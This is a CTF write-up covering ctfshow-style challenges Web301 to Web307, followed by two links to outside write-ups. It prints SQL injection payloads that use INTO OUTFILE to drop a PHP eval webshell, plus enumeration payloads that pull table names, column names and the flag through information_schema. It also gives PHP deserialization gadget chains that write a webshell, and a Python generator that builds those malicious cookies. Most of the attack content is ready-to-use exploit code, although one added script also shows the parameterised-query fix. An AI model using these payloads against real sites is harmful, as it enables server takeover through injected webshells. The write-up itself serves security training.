Web301

Vulnerable code

checklogin.php, no filtering: $username is concatenated straight into the query
$sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;";

Payload

Sent as the username (a UNION whose SELECT INTO OUTFILE drops a webshell; this needs the MySQL FILE privilege and a web root the database user can write to):
xx' union select "<?php eval($_POST[cmd]);?>" into outfile "/var/www/html/a.php"#

sqlmap approach
sqlmap -u "url" --dump --form --batch
Options: --dump dumps the table contents, --form parses the login form and tests its fields, --batch never prompts and takes the default answer to every question

Web302

Vulnerable code

checklogin.php checks the query result afterwards, but still applies no filtering to the input before the query runs

Payload

Sent as the username (same injection as Web301, using the short echo tag <?= instead of <?php):
xx' union select "<?=eval($_POST[cmd])?>" into outfile "/var/www/html/a.php"#

Web303-304

Vulnerable code

After logging in as admin/admin, dptadd.php takes the department fields and concatenates them into an INSERT:
$sql="insert into sds_dpt set sds_name='".$dpt_name."',sds_address ='".$dpt_address."',sds_build_date='".$dpt_build_year."',sds_have_safe_card='".$dpt_has_cert."',sds_safe_card_num='".$dpt_cert_number."',sds_telephone='".$dpt_telephone_number."';";

Payloads, sent one at a time as dpt_name (the closing quote ends the sds_name value, the extra sds_address= assignment overrides that column with a subquery, and # comments out the rest of the statement)

// table names in the current database
dpt_name=1',sds_address=(select group_concat(table_name) from information_schema.tables where table_schema=database())#

// column names of the sds_flaag table
dpt_name=1',sds_address=(select group_concat(column_name) from information_schema.columns where table_name='sds_flaag')#

// read the flag column
dpt_name=1',sds_address=(select flag from sds_flaag)#
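As an added example (not part of the original writeup), the following Python script reproduces the Web301 UNION injection and the three-step tables/columns/data dump of Web303-304 against a constructed in-memory SQLite database, next to the parameterised query that stops it. The schema, the password hash and the flag value are sample data. SQLite stands in for MySQL, so the payloads are adapted: the line comment is -- instead of #, sqlite_master and pragma_table_info() replace information_schema, and there is no INTO OUTFILE.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the challenge database (sample data, not the real one)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        create table sds_user(id integer primary key, sds_username text, sds_password text);
        create table sds_flaag(flag text);
        insert into sds_user(sds_username, sds_password) values ('admin', 'hashed-admin-pw');
        insert into sds_flaag(flag) values ('ctfshow{constructed-sample-flag}');
    """)
    return conn


def lookup_vulnerable(conn, username):
    """Same string concatenation as checklogin.php: the username becomes SQL text."""
    sql = ("select sds_password from sds_user where sds_username='"
           + username + "' order by id limit 1;")
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, username):
    """Parameterised form: the username can only ever be a value, never SQL."""
    sql = "select sds_password from sds_user where sds_username=? order by id limit 1;"
    return [row[0] for row in conn.execute(sql, (username,))]


# SQLite spells a line comment as '-- ' (MySQL's '#' is not a comment here) and has no
# information_schema; sqlite_master and pragma_table_info() play the same role.
STAGES = [
    "xx' union select group_concat(name) from sqlite_master where type='table' -- ",
    "xx' union select group_concat(name) from pragma_table_info('sds_flaag') -- ",
    "xx' union select flag from sds_flaag -- ",
]


def enumerate_via_union(conn):
    """The three-step dump of Web303-304 (tables -> columns -> data), driven through the
    UNION injection of Web301. Returns one result string per stage."""
    return [lookup_vulnerable(conn, stage)[0] for stage in STAGES]


if __name__ == "__main__":
    db = make_db()
    for stage, result in zip(STAGES, enumerate_via_union(db)):
        print(f"{stage!r:85} -> {result}")
    # The same payload against the parameterised query finds no such user: []
    print("parameterised:", lookup_safe(db, STAGES[2]))
```

The first select in each stage matches nothing (no user named xx), so every row that comes back is the attacker's UNION branch; the original order by id limit 1 is swallowed by the comment, which is why the payloads end with a comment marker rather than a closing quote.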

Web305

Vulnerable code

checklogin.php

if(isset($user_cookie)){
    $user = unserialize($user_cookie);
}

class.php

class user{
    public $username;
    public $password;
    public function __construct($u,$p){
        $this->username=$u;
        $this->password=$p;
    }
    public function __destruct(){
        // runs when the object is destroyed (at the latest at the end of the request):
        // writes $password into the file named $username
        file_put_contents($this->username, $this->password);
    }
}

Payload
Generate it locally with PHP: copy the user class from class.php (leave out __destruct, otherwise running the generator writes a.php on your own machine) and echo the serialized value

<?php
class user{
    public $username;
    public $password;
    public function __construct($u,$p){
        $this->username=$u;
        $this->password=$p;
    }
    // __destruct intentionally omitted: the file write should happen on the target, not here
}
echo serialize(new user('a.php','<?php eval($_POST[cmd]);?>'));

URL-encode the output and send it as a cookie: name user, value the output above, path /checklogin.php

Web306

Code audit

class.php

class log{
    public $title='log.txt';
    public $info='';// both properties are under our control after unserialize

    public function close(){
        file_put_contents($this->title, $this->info);
    }// arbitrary file write: $info goes into the file named $title
}

**dao.php**
class dao{
    public function __destruct(){
        $this->conn->close();
    }
}// calls close() on whatever object $conn holds, so a log object placed in $conn reaches the file write

**index.php**
$user = unserialize(base64_decode($_COOKIE['user']));
// unserialize entry point: the user cookie is attacker-controlled

POC

<?php
class dao{
    private $conn;// private: the serialized property name is "\0dao\0conn" (NUL bytes), which is why the cookie is base64
    public function __construct(){
        $this->conn=new log();
    }
    // __destruct intentionally omitted: with it, running this generator would write a.php locally
}

class log{
    public $title='a.php';
    public $info='<?php eval($_POST[cmd]);?>';
}

$a=new dao();
echo base64_encode(serialize($a));

Put the output in a cookie: name user, value the output above, path /index.php; then visit index.php and the chain runs
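As an added example (not from the original writeup), this Python script builds the Web305 and Web306 cookies without a local PHP install, by hand-encoding PHP's serialize() format for the user and dao->log objects shown above. The class names, property names and webshell string are the page's; the PhpObject helper and the function names are this example's own, and it covers public, protected and private properties so the same generator works for chains where the property is not public.

```python
import base64
from urllib.parse import quote

WEBSHELL = '<?php eval($_POST[cmd]);?>'


class PhpObject:
    """A PHP object to serialize: class name plus (visibility, name, value) triples,
    in declaration order, because PHP emits properties in that order."""
    def __init__(self, cls, props):
        self.cls = cls
        self.props = props


def _php_str(s):
    # PHP counts bytes, not characters, so measure the UTF-8 encoding.
    return 's:%d:"%s";' % (len(s.encode("utf-8")), s)


def php_serialize(value):
    """Hand-rolled subset of PHP serialize(): null, bool, int, string, object."""
    if value is None:
        return "N;"
    if isinstance(value, bool):
        return "b:%d;" % int(value)
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, str):
        return _php_str(value)
    if isinstance(value, PhpObject):
        body = ""
        for visibility, name, val in value.props:
            # Non-public properties are name-mangled with NUL bytes: "\0Class\0prop" for
            # private, "\0*\0prop" for protected. Those bytes are why Web306 uses base64.
            if visibility == "private":
                key = "\0%s\0%s" % (value.cls, name)
            elif visibility == "protected":
                key = "\0*\0%s" % name
            else:
                key = name
            body += _php_str(key) + php_serialize(val)
        return 'O:%d:"%s":%d:{%s}' % (len(value.cls), value.cls, len(value.props), body)
    raise TypeError("unsupported type: %r" % type(value))


def web305_payload():
    """user object: __destruct writes $password into the file named $username."""
    user = PhpObject("user", [("public", "username", "a.php"),
                              ("public", "password", WEBSHELL)])
    return php_serialize(user)


def web306_payload():
    """dao->conn (private) holds a log; dao::__destruct calls $this->conn->close(),
    and log::close() does file_put_contents($title, $info)."""
    log = PhpObject("log", [("public", "title", "a.php"), ("public", "info", WEBSHELL)])
    dao = PhpObject("dao", [("private", "conn", log)])
    return php_serialize(dao)


def web305_cookie():
    # checklogin.php unserializes the raw cookie value, so URL-encoding is all it needs
    return quote(web305_payload(), safe="")


def web306_cookie():
    # index.php base64-decodes first; latin-1 keeps every byte, NULs included, as one byte
    return base64.b64encode(web306_payload().encode("latin-1")).decode("ascii")


if __name__ == "__main__":
    print("Cookie: user=" + web305_cookie() + "; path=/checklogin.php")
    print("Cookie: user=" + web306_cookie() + "; path=/index.php")
```

The Web306 output, base64-decoded, is byte-for-byte what echo serialize($a) prints in the PHP generator above, including the mangled private name \0dao\0conn; if you ever hand-edit such a string, keep the s:N: byte counts in sync or PHP's unserialize fails silently and the destructor never runs.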

Web307

WP

https://blog.csdn.net/weixin_45669205/article/details/115462061
https://blog.csdn.net/miuzzx/article/details/111352849
Last modified: 17 July 2022